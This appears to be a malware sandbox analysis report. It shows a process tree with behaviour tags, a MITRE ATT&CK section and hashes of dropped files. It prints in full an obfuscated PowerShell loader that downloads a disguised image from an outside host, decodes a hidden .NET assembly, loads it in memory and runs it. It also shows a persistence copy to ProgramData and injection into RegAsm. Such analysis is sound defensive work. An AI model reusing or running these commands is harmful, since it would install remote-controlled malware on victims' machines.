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VwBoWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsWQBYWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBZWOQNgdNPWgDJDsFMWOQNgdNPWgDJDsOQB0WOQNgdNPWgDJDsGIWOQNgdNPWgDJDsMgBNWOQNgdNPWgDJDsHUWOQNgdNPWgDJDsYwBIWOQNgdNPWgDJDsEIWOQNgdNPWgDJDsaWOQNgdNPWgDJDsBaWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsSgB2WOQNgdNPWgDJDsFkWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsWgBDWOQNgdNPWgDJDsDUWOQNgdNPWgDJDsdQBaWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsTQB2WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBwWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBIWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsPQWOQNgdNPWgDJDs9WOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZwBvWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsMwWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBDWOQNgdNPWgDJDsDoWOQNgdNPWgDJDscgBCWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsUWOQNgdNPWgDJDsByWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwByWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsbQBEWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsQgBBWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsbwBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDspWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsJwWOQNgdNPWgDJDspWOQNgdNPWgDJDsC4WOQNgdNPWgDJDsUgBlWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsTWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsGMWOQNgdNPWgDJDsRQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsJwWOQNgdNPWgDJDssWOQNgdNPWgDJDsFsWOQNgdNPWgDJDscwBUWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsaQBOWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsXQBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDszWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsuWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsZQBwWOQNgdNPWgDJDsEwWOQNgdNPWgDJDsQQBjWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsKWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsLWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsHMWOQNgdNPWgDJDsVWOQNgdNPWgDJDsByWOQNgdNPWgDJDsGkWOQNgdNPWgDJDsTgBHWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsWwBDWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsQQByWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsMwWOQNgdNPWgDJDs2WOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBSWOQNgdNPWgDJDsGUWOQNgdNPWgDJDscWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsYwBFWOQNgdNPWgDJDsCgWOQNgdNPWgDJDsKWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsNWOQNgdNPWgDJDsWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNgWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNQWOQNgdNPWgDJDspWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsJwBcWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCkWOQNgdNPWgDJDs';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:5080
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD50b71bdcf7c43cd37cd341d807b0843d4
SHA128630322cb4d78e60f6360326bfef41f4f4a8de7
SHA2560793a20b3a3412c427d3a44f7ba594dac121782effead4b2f74c025ab5c272dc
SHA512639ccb7532902dc80222a5542ff0b33291b68e76d69bec3ce1fb48e477c83622f5ccd33cf90b2a455dd4b7ea39423bf5f720e1ea1571eb6333747e9124c36530
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD553ff085e18a63b8d5dd3d32a0a2bcd3a
SHA1f1a9ed121c550971ae08ed476e9123e3d45a349c
SHA256f348308a4428468e0ad80ec314331712e1257fa28787e22346a6f39a79de49d0
SHA5127a733c6ee62dd102b956641b7edee5b58cee26ee8a3e108f476103541e19f4928c95c145b3becc15d6b2ad62e2c521ef7e5c89d73daf838ad4bc74ca64dec965
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82